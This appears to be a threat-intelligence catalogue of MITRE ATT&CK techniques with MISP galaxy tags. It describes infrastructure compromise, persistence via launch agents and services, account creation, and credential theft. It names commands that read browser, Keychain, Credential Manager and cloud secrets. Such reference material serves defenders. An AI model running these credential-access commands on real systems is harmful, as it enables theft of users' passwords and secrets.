Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing]([Recorded Future Turla Infra 2020(https://app.tidalcyber.com/references/73aaff33-5a0e-40b7-a089-77ac57da8dca)]</sup> Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

The tag is: misp-galaxy:technique="Web Services"

Compromise Infrastructure

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup><sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup> Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>

The tag is: misp-galaxy:technique="Compromise Infrastructure"

Container Administration Command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.<sup>[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup><sup>[[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]</sup>

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.<sup>[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)]</sup><sup>[[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)]</sup> In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.<sup>[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]</sup>

The tag is: misp-galaxy:technique="Container Administration Command"

Container and Resource Discovery

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup> In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: misp-galaxy:technique="Container and Resource Discovery"

Content Injection

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.<sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup>

Adversaries may inject content to victim systems in various ways, including:

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."<sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup><sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup><sup>[[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]</sup>

The tag is: misp-galaxy:technique="Content Injection"

Cloud Account

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.<sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[AWS Create IAM User](https://app.tidalcyber.com/references/bb474e88-b7bb-4b92-837c-95fe7bdd03f7)]</sup><sup>[[GCP Create Cloud Identity Users](https://app.tidalcyber.com/references/e91748b2-1432-4203-a1fe-100aa70458d2)]</sup><sup>[[Microsoft Azure AD Users](https://app.tidalcyber.com/references/b69468a2-693e-4bd0-8dc1-ccfd7d5630c0)]</sup>

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) or assigning [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).

The tag is: misp-galaxy:technique="Cloud Account"

Domain Account

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:technique="Domain Account"

Local Account

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>username</code>, or to Kubernetes clusters using the kubectl utility.<sup>[[cisco_username_cmd](https://app.tidalcyber.com/references/8e7b99d7-ad94-5802-a1ee-6334842e7e0b)]</sup><sup>[[Kubernetes Service Accounts Security](https://app.tidalcyber.com/references/522eaa6b-0075-5346-bf3c-db1e7820aba2)]</sup>

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:technique="Local Account"

Create Account

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: misp-galaxy:technique="Create Account"

Launch Agent

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup> Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent’s name, executable location, and execution time.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the [Launchctl](https://app.tidalcyber.com/technique/8edc6345-c423-4872-9e22-11e22d9164ff) command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup><sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup>

The tag is: misp-galaxy:technique="Launch Agent"

Launch Daemon

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[launchd Keywords for plists](https://app.tidalcyber.com/references/1bcd2a93-93e7-48d8-ad25-6f09e94123aa)]</sup>

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd)). When the Launch Daemon is executed, the program inherits administrative permissions.<sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup><sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup>

Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as <code>usr/local/bin</code> to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon’s plist files.<sup>[[LaunchDaemon Hijacking](https://app.tidalcyber.com/references/51d1e4d9-265a-48ca-834b-4daa1f386bb4)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>

The tag is: misp-galaxy:technique="Launch Daemon"

Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the .service file extension to encode information about a service’s process. By default, system level unit files are stored in the /systemd/system directory of the root owned directories (/). User level unit files are stored in the /systemd/user directories of the user owned directories ($HOME).<sup>[[lambert systemd 2022](https://app.tidalcyber.com/references/196f0c77-4c98-57e7-ad79-eb43bdd2c848)]</sup>

Inside the .service unit files, the following directives are used to execute commands:<sup>[[freedesktop systemd.service](https://app.tidalcyber.com/references/cae49a7a-db3b-5202-ba45-fbfa98b073c9)]</sup>

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.

  • ExecReload directive executes when a service restarts.

  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.<sup>[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)]</sup><sup>[[airwalk backdoor unix systems](https://app.tidalcyber.com/references/3f3bca4a-68fa-5d4a-b86f-36f82345ff36)]</sup><sup>[[Rapid7 Service Persistence 22JUNE2016](https://app.tidalcyber.com/references/75441af3-2ff6-42c8-b7f1-c8dc2c27efe2)]</sup>

The tag is: misp-galaxy:technique="Systemd Service"

Windows Service

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)), or by using command-line utilities such as PnPUtil.exe.<sup>[[Symantec W.32 Stuxnet Dossier](https://app.tidalcyber.com/references/ef65ab18-fd84-4098-8805-df0268fc3a38)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may leverage these drivers as [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation]([ESET InvisiMole June 2020(https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup>

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://app.tidalcyber.com/technique/86c2f355-3c97-44c1-9a83-e3d016f50535) (ex: using a service and/or payload name related to a legitimate OS or benign software component).

The tag is: misp-galaxy:technique="Windows Service"

Create or Modify System Process

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup>

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup>

The tag is: misp-galaxy:technique="Create or Modify System Process"

Cloud Secrets Management Stores

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure.<sup>[[Permiso Scattered Spider 2023](https://app.tidalcyber.com/references/020b97ab-466d-52e6-b1f1-6f9f8ffdabf0)]</sup><sup>[[Sysdig ScarletEel 2.0 2023](https://app.tidalcyber.com/references/285266e7-7a62-5f98-9b0f-fefde4b21c88)]</sup><sup>[[AWS Secrets Manager](https://app.tidalcyber.com/references/ec87e183-3018-5cac-9fab-711003be54f7)]</sup><sup>[[Google Cloud Secrets](https://app.tidalcyber.com/references/4a9e631d-3588-5585-b00a-316a934e6009)]</sup><sup>[[Microsoft Azure Key Vault](https://app.tidalcyber.com/references/8f076aae-38c0-5335-9f7a-1e29b90fc33f)]</sup>

Note: this technique is distinct from [Cloud Instance Metadata API](https://app.tidalcyber.com/technique/a5a95893-d837-424a-979f-095a47dd9f34) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

The tag is: misp-galaxy:technique="Cloud Secrets Management Stores"

Credentials from Web Browsers

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.<sup>[[Microsoft CryptUnprotectData April 2018](https://app.tidalcyber.com/references/258088ae-96c2-4520-8eb5-1a7e540a9a24)]</sup>

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.<sup>[[Proofpoint Vega Credential Stealer May 2018](https://app.tidalcyber.com/references/c52fe62f-4df4-43b0-a126-2df07dc61fc0)]</sup><sup>[[FireEye HawkEye Malware July 2017](https://app.tidalcyber.com/references/7ad228a8-5450-45ec-86fc-ea038f7c6ef7)]</sup> Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://app.tidalcyber.com/technique/9503955c-fa53-452a-b717-7e23bfb4df83).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.<sup>[[GitHub Mimikittenz July 2016](https://app.tidalcyber.com/references/2e0a95b2-3f9a-4638-9bc5-ff1f3ac2af4b)]</sup>

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:technique="Credentials from Web Browsers"

Keychain

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.<sup>[[Keychain Services Apple](https://app.tidalcyber.com/references/0754f48d-dad8-480c-953c-256be4dfcfc3)]</sup><sup>[[Keychain Decryption Passware](https://app.tidalcyber.com/references/6a426ab4-5b0b-46d4-9dfe-e2587f69e111)]</sup><sup>[[OSX Keychain Schaumann](https://app.tidalcyber.com/references/d0ac448a-7299-4ddc-8730-be72fb840ccb)]</sup>

Adversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain –d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.<sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup><sup>[[Empire Keychain Decrypt](https://app.tidalcyber.com/references/41075230-73a2-4195-b716-379f9e5ae93b)]</sup>

The tag is: misp-galaxy:technique="Keychain"

Password Managers

Adversaries may acquire user credentials from third-party password managers.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup> Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.<sup>[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]</sup>

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup><sup>[[Github KeeThief](https://app.tidalcyber.com/references/3b6231fb-5b52-4a3a-a21f-0881901d0037)]</sup> Adversaries may extract credentials from memory via [Exploitation for Credential Access]([NVD CVE-2019-3610(https://app.tidalcyber.com/references/889b742e-7572-4aad-8944-7f071483b613)]</sup> Adversaries may also try brute forcing via [Password Guessing](https://app.tidalcyber.com/technique/e849ebcc-e0af-45a5-aefa-c394bb759b4e) to obtain the master password of a password manager.<sup>[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]</sup>

The tag is: misp-galaxy:technique="Password Managers"

Securityd Memory

An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup>

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup> Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup>

The tag is: misp-galaxy:technique="Securityd Memory"

Windows Credential Manager

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).<sup>[[Microsoft Credential Manager store](https://app.tidalcyber.com/references/c949a29b-bb31-4bd7-a967-ddd48c7efb8e)]</sup><sup>[[Microsoft Credential Locker](https://app.tidalcyber.com/references/77505354-bb08-464c-9176-d0015a62c7c9)]</sup>

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://app.tidalcyber.com/technique/b4a1cbaa-85d1-4a65-977f-494f66a141e3), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.<sup>[[passcape Windows Vault](https://app.tidalcyber.com/references/a8a56a64-8e73-4331-9961-b1f9b6cbb348)]</sup><sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.<sup>[[Microsoft CredEnumerate](https://app.tidalcyber.com/references/ec3e7b3f-99dd-4f2f-885b-09d66b01fe3e)]</sup><sup>[[Delpy Mimikatz Crendential Manager](https://app.tidalcyber.com/references/24c6027b-e0d2-4c0c-83af-4536a631ea85)]</sup>

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up…​” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.<sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>

The tag is: misp-galaxy:technique="Windows Credential Manager"

Credentials from Password Stores

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:technique="Credentials from Password Stores"

Data Destruction

